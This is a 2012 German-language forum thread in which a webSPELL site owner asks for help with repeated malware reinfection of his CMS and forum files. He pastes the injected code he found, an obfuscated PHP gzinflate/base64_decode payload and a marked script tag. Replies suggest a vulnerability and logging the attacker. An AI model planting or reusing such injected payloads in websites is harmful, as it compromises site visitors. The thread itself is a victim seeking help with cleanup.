• » webSPELL.org - Free Content Management System
  • Language switch: English German
  • login



    » lost password?   » register now
  • About webSPELL

    webSPELL is a free Content Management System which was especially developed for the needs of esport related communities. Since a short while we are also offering an optimized and enhanced webSPELL version for the special requirements of non-profit organisations. The purpose of both systems is to offer a professional and free opportunity to create and administrate your own website in an easy and optimized way.

    » Learn more about webSPELL     » Download webSPELL now!
  • Advertisement

    Follow us

  • Sort:     printview
    Author
    Message
    webSPELL newbie
    31 Posts
    18.07.2012, 17:43 offline quote 

    servus
    Seit einigen Wochen habe ich nun Kopfzerbrechen und finde nirgends wirklich Hilfe!
    Da wir nun Jahre lang auf Webspell setzten und hier auch Qualifizierte Leute anwesend sind wollte ich es auch mal hier versuchen.

    Das Problem ist folgender:
    Seit vielen Wochen schlagen die Antivir Programmer vieler thedaemon.de Besucher Alarm.
    Hab mehrmals Schadhafte Scriptteile gefunden(interessant wie die dahin gelangen) sie auch gelöscht.
    Vor ca. 1-2 Wochen wurd dann zum ersten mal die Domain von Google und von der Technik Abteilung unseren Webspace host geschlossen. Hab wie schon oft in Foren gelesen:
    einen Datenbank Backup gemacht. Alles vom Space gelöscht und die neueste Version installiert!(unten mehr dazu)
    Es lief wieder aber bis zum 16.07.12 hielt das Ganze leider nur!

    Zwar schlägt Google folgendes vor: http://www.stopbadware.org/home/security damit aber kann ich nichts anfangen
    Was würdet ihr an meiner stelle machen?

    Die Scripte die auf dem Server laufen:
    Webspell 4.2.3a (thedaemon.de/page)
    Burning Board Lite 2.0.1 (thedaemon.de/forum)
    (Die FTP Daten wurden auch geändert!)


    Was mir aufgefallen ist:
    auf dem Server werden folgende Datein geändert:

    Webspell:
    index.php
    checklogin.php
    admin/index.php
    templates/clanwar_edit.html
    templates/clanwar_new.html


    BurningBoardLite:
    index.php
    acp/index.php
    wcf\templates\compiled\27_0_2_board.php
    wcf\templates\compiled\27_0_2_index.php
    wcf\templates\compiled\27_0_2_postAdd.php
    wcf\templates\compiled\27_0_2_postEdit.php
    wcf\templates\compiled\27_0_2_thread.php
    wcf\templates\compiled\27_0_2_threadAdd.php
    wcf\templates\compiled\27_0_3_index.php

    Ich kann unmöglich alle Dateien manuel danach absuchen amüsiert

    Die Enterpage(index.html),da soll auch was drauf sein.
    Beim runterladen ist er kurz auf dem Desktop, aber nach spätestens 30-60 sekunden popt von Windows7 Essentiells eine grüne Meldung und die Datei verschwindet. Die Datei lässt sich auch nicht öffnen!

    So sieht der Teil aus:
    Code:
    1.
    2.
    3.
    #c3284d#
    echo(gzinflate(base64_decode("VVHBboMwDL1X6j/kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS+nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns/48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B/ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2+/EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS/7parGmkfU+y1b5D/HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18+XyLoNfNISRsBa1fG1UKwN+HIeK+Pqabw==")));
    #c3284d#


    Code:
    1.
    2.
    !--c3284d--><script>                                    
    </script><!--/c3284d-->


    EDIT// 17:50Uhr 18.07.12
    The following are example URLs from your site where we found such content:

    http://www.thedaemon.d...e1efd5d836a9cf93cc7ffd875
    http://www.thedaemon.d...e1efd5d836a9cf93cc7ffd875

    Wenn ich das lösche hab ich paar Minuten Ruhe und dann steht es wieder da wo es vorher stand unglücklich

    Kurz ich bin am verzeifeln. Weiß nicht mehr weiter!
    Hoffe ihr könnt uns da weiter helfen!
    LG Burak B. / Radonaktiv
    Administrator
    Member of webSPELL e.V.
    1454 Posts
    18.07.2012, 17:54 offline quote 


    perl -e 'print $i=pack(c5,(41*2),sqrt(7056),(unpack(c,H)-2),oct(115),10);'
    webSPELL newbie
    31 Posts
    18.07.2012, 18:16 offline quote 

    danke für die schnelle antwort!

    naya... so viel mehr hilft mir die seite auch nicht!

    von irgendwo hat der hacker oder wer auch immer nen zugang zu der seite!
    hab mehrmals alels erneuert.... passwörter x male geändert(sei es forum, page, ftp etc.),
    aber irgendwie kommt da trotzdem was druch :/
    webSPELL lover
    1201 Posts
    18.07.2012, 18:41 offline quote 

    Vielleicht hilft dir das hier weiter.
    webSPELL newbie
    31 Posts
    18.07.2012, 21:31 offline quote 

    cool, danke.
    hab ich alles schon gemacht. ich würd mal salop behaupten, das die nicht mein problem ist.
    wer sucht der findet auch etwas nur komisch ist, obwohl ich alle passwörter ändern, hab ich nach ne kurzen zeit die gelöschten zeilen wieder dort wo sie vorher waren.
    das zeigt mir das es irgendwo nen türchen offen ist. oder lieg ich da falsch?

    anders gefragt: wie kann man solche code zeilen denn als hacker etc. in die daten andere hinzufügen?
    per ftp zugang oder andere methoden?
    bei ftp müsste es doch so sein, sobald ich alles lösche, daten änder und alles neubeziehe dürfte der zugang doch gekappt sein?
    webSPELL lover
    1003 Posts
    18.07.2012, 23:58 email offline quote 

    Es könnte mehre Ursachen haben.
    Entweder hat der Webspace eine Sicherheitslücke oder deine Webseite.
    Wenn man diese nach belieben ausnutzen kann kommt man immer anndie aktuelken Zugangsdaten.

    Interessant wäre es die ip zu loggen vom Angreifer. Eventuell auch die Anfragen selbst damit könnte man auch die Schwachstelle ausmachen.
    Da sollte aber dein Hoster der richtige Ansprechpartner sein.

    Wesbepell Addon Erstellung und Anpassungen (x)HTML Valide div/css
    Bei interesse PM mit ausführlicher Beschreibung und Preisvorstellung.
    Sort:     printview


    To start or to reply to a topic you have to be registered and logged in!

    register now
    login
  • » Support

    » Topics
    25.05.2013 - 19:01 - 1 Replies
    » Error 1146
    Error 1146
    Last post: Argu
    Board: EN - Technical support
    25.05.2013 - 19:01
    25.05.2013 - 17:51 - 0 Replies
    » Gewinnspiel
    Gewinnspiel
    Last post: Dynamic-Webmedia
    Board: DE - Aus aller Welt
    25.05.2013 - 17:51
    25.05.2013 - 13:19 - 465 Replies
    » Wettscript 2.1 for 4.2.3a...
    Wettscript 2.1 for 4.2.3a - Betscript
    Last post: eXor
    Board: DE - Fertige Skripte
    25.05.2013 - 13:19
    25.05.2013 - 12:35 - 1 Replies
    » Need coder for a design!
    Need coder for a design!
    Last post: wantedJK-
    Board: EN - General
    25.05.2013 - 12:35
    25.05.2013 - 03:18 - 0 Replies
    » ScooterFreakz.com - Motor...
    ScooterFreakz.com - Motorroller Community
    Last post: Tuner77
    Board: DE - Showroom
    25.05.2013 - 03:18
    25.05.2013 - 00:46 - 8 Replies
    » Ändern der Größe php
    Ändern der Größe php
    Last post: andy5116
    Board: DE - Allgemeiner Support
    25.05.2013 - 00:46
    24.05.2013 - 23:39 - 33 Replies
    » [B]Userrank Addon
    [B]Userrank Addon
    Last post: Swordfish3000
    Board: DE - Erweiterungen
    24.05.2013 - 23:39
    24.05.2013 - 15:12 - 19 Replies
    » forum anzeige erweitern
    forum anzeige erweitern
    Last post: Swordfish3000
    Board: DE - Allgemeiner Support
    24.05.2013 - 15:12
    24.05.2013 - 12:03 - 1 Replies
    » Verkaufe prof. Clandesign
    Verkaufe prof. Clandesign
    Last post: Vith3r
    Board: DE - Biete
    24.05.2013 - 12:03
    24.05.2013 - 12:02 - 6 Replies
    » [S] Team/Clan Logos (Upda...
    [S] Team/Clan Logos (Update: 2 new Logos)
    Last post: a--w
    Board: EN - Offers
    24.05.2013 - 12:02
    24.05.2013 - 02:41 - 17 Replies
    » High Quality Website
    High Quality Website
    Last post: Dansjostedt
    Board: EN - Offers
    24.05.2013 - 02:41
    24.05.2013 - 02:24 - 5 Replies
    » [SELL] Gaming Website
    [SELL] Gaming Website
    Last post: hornyst
    Board: EN - Offers
    24.05.2013 - 02:24
    23.05.2013 - 22:37 - 2 Replies
    » Bilder Breite im Forum an...
    Bilder Breite im Forum anpassen
    Last post: nappel.ger
    Board: DE - Vorschläge
    23.05.2013 - 22:37
    23.05.2013 - 15:35 - 6 Replies
    » I cannot upload template ...
    I cannot upload template to my cms .
    Last post: bazic
    Board: EN - General
    23.05.2013 - 15:35
    23.05.2013 - 14:50 - 3 Replies
    » Kalendar-Box
    Kalendar-Box
    Last post: kassor
    Board: DE - Anfragen
    23.05.2013 - 14:50
    23.05.2013 - 10:14 - 12 Replies
    » Mein Forum
    Mein Forum
    Last post: Lordy4007
    Board: DE - Fragen zur Seite
    23.05.2013 - 10:14
    22.05.2013 - 23:06 - 9 Replies
    » When the update?
    When the update?
    Last post: kola60
    Board: EN - General
    22.05.2013 - 23:06
    22.05.2013 - 22:21 - 2 Replies
    » Website For SALE! CODED
    Website For SALE! CODED
    Last post: Osamakillz
    Board: EN - General
    22.05.2013 - 22:21
    22.05.2013 - 21:43 - 3 Replies
    » Slider Links Bitte um Hil...
    Slider Links Bitte um Hilfe
    Last post: bazic
    Board: DE - Allgemein
    22.05.2013 - 21:43
    22.05.2013 - 17:46 - 3 Replies
    » Admin login
    Admin login
    Last post: blackmoonstah
    Board: DE - Allgemeiner Support
    22.05.2013 - 17:46
    » Partners
    Bilderkiste.org Image Hosting
    k3rmit.org
    PascalMh.de


    » Blog
    28.03.2013 - derchris
    » Those damn spammers